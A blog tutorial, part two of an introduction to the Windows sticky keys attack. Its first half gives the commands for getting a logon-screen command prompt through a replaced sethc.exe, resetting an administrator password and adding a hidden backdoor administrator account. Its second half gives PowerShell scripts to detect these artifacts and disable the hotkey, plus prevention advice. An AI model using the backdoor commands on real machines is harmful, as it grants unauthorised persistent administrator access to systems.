This is part 2 of my intro to the sticky keys attack. After rebooting the system, we can press the Shift key five times at the logon screen to open a cmd prompt (this relies on the replacement of sethc.exe).
Now we can use either the GUI or the command line to add a backdoor user.
Method 1: GUI
In the cmd prompt we type: control userpasswords2
Choose a user that is a member of the administrators group and reset the password, or create a new user.
Method 2: Use the cmd
Get the administrators list: net localgroup administrators
(You'll get a list of all users that belong to the local administrators group)
Change the password by typing: net user "username" password
Log in with the new credentials. Enjoy!
How to create a backdoor user
Create a new user: net user /add hiddenuser secretpassword
Add the user to the local administrators group: net localgroup administrators hiddenuser /add
Set the user to hidden: net user hiddenuser /active:no
Check the backdoor user's visibility: control userpasswords2
The hiddenuser should not be shown.
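From the defender's side, both halves of this attack leave artifacts that are easy to audit: a sethc.exe that is no longer the accessibility binary, and an account in the local Administrators group that nobody remembers creating. The following PowerShell script is an added example written for this post (not code from the original article); it assumes the standard System32 paths and only uses built-in cmdlets (Get-FileHash, Get-AuthenticodeSignature, Get-LocalGroupMember, Get-LocalUser). Run it from an elevated prompt.

```powershell
# Added example, not part of the original post: audit a Windows host for the two
# artifacts the sticky keys attack leaves behind. Run from an elevated PowerShell.
# Assumptions: built-in cmdlets only, standard System32 paths.

$system32 = Join-Path $env:SystemRoot 'System32'
$sethc    = Join-Path $system32 'sethc.exe'
$cmd      = Join-Path $system32 'cmd.exe'

# 1. Has sethc.exe been swapped for cmd.exe?
#    A copied-over binary hashes identically to cmd.exe and carries cmd.exe's
#    OriginalFilename in its version resource. A tampered file also loses its
#    valid Microsoft Authenticode signature.
$sethcHash = (Get-FileHash -Path $sethc -Algorithm SHA256).Hash
$cmdHash   = (Get-FileHash -Path $cmd   -Algorithm SHA256).Hash
$sethcInfo = (Get-Item $sethc).VersionInfo
$cmdInfo   = (Get-Item $cmd).VersionInfo
$sig       = Get-AuthenticodeSignature -FilePath $sethc

if ($sethcHash -eq $cmdHash -or $sethcInfo.OriginalFilename -eq $cmdInfo.OriginalFilename) {
    Write-Warning "sethc.exe matches cmd.exe (hash or OriginalFilename): sticky keys backdoor present"
} elseif ($sig.Status -ne 'Valid') {
    Write-Warning "sethc.exe signature status is $($sig.Status); file may have been replaced"
} else {
    Write-Output "sethc.exe looks intact (OriginalFilename=$($sethcInfo.OriginalFilename), signature $($sig.Status))"
}

# 2. Who is in the local Administrators group, and which of those accounts are
#    disabled? An account created with 'net user /add', added to Administrators
#    and then set /active:no shows up here as a disabled local admin with a
#    recent PasswordLastSet and no logons, which is exactly what to look for.
Get-LocalGroupMember -Group 'Administrators' |
    Where-Object { $_.ObjectClass -eq 'User' -and $_.PrincipalSource -eq 'Local' } |
    ForEach-Object {
        $name = ($_.Name -split '\\')[-1]       # strip the COMPUTER\ prefix
        $u = Get-LocalUser -Name $name
        [pscustomobject]@{
            User            = $name
            Enabled         = $u.Enabled
            PasswordLastSet = $u.PasswordLastSet
            LastLogon       = $u.LastLogon
        }
    } | Format-Table -AutoSize
```

Note that the first check asks the running operating system about its own files; if the machine is already compromised, the result is only as trustworthy as that OS. Mounting the disk from a known-clean boot medium and comparing the hashes there gives a more reliable answer.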
Prevention of the sticky keys attack
- encrypt your hard drive (without the key, sethc.exe cannot be replaced offline)
- set a BIOS password
- disable booting from additional devices (flash drives/USB/CD/DVD)
- Turn off Sticky keys:
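One way to turn off the Sticky Keys hotkey is through the registry, and it has to be done for the logon screen's profile (HKEY_USERS\.DEFAULT), not only for the current user, because the attack triggers before anyone logs in. The script below is an added example for this post, not code from the original article. It assumes the documented layout of the StickyKeys Flags value: the default is "510", bit 0x4 (SKF_HOTKEYACTIVE) enables the five-presses-of-Shift trigger, and clearing that bit gives "506". Run it elevated.

```powershell
# Added example, not part of the original post: disable the Sticky Keys hotkey
# for the logon screen (HKEY_USERS\.DEFAULT) and for the current user.
# Assumption: Flags is a REG_SZ bitmask (Windows default "510") in which
# bit 0x4 = SKF_HOTKEYACTIVE controls the "press Shift five times" trigger.

$paths = @(
    'Registry::HKEY_USERS\.DEFAULT\Control Panel\Accessibility\StickyKeys',  # logon screen
    'HKCU:\Control Panel\Accessibility\StickyKeys'                            # current user
)
$HotkeyActive = 4

foreach ($path in $paths) {
    if (-not (Test-Path $path)) { New-Item -Path $path -Force | Out-Null }
    # Read the current bitmask; fall back to the Windows default if the value is missing.
    $current = [int](Get-ItemProperty -Path $path -Name Flags -ErrorAction SilentlyContinue).Flags
    if (-not $current) { $current = 510 }
    # Clear only the hotkey bit so the remaining accessibility settings are untouched.
    $new = $current -band (-bnot $HotkeyActive)
    Set-ItemProperty -Path $path -Name Flags -Value ([string]$new) -Type String
    Write-Output ("{0}: Flags {1} -> {2}" -f $path, $current, $new)
}
```

This only removes the trigger: a sethc.exe that was already replaced stays replaced, and an attacker with offline disk access can set the value back. Treat it as defence in depth behind disk encryption and the boot restrictions above, not as a substitute for them.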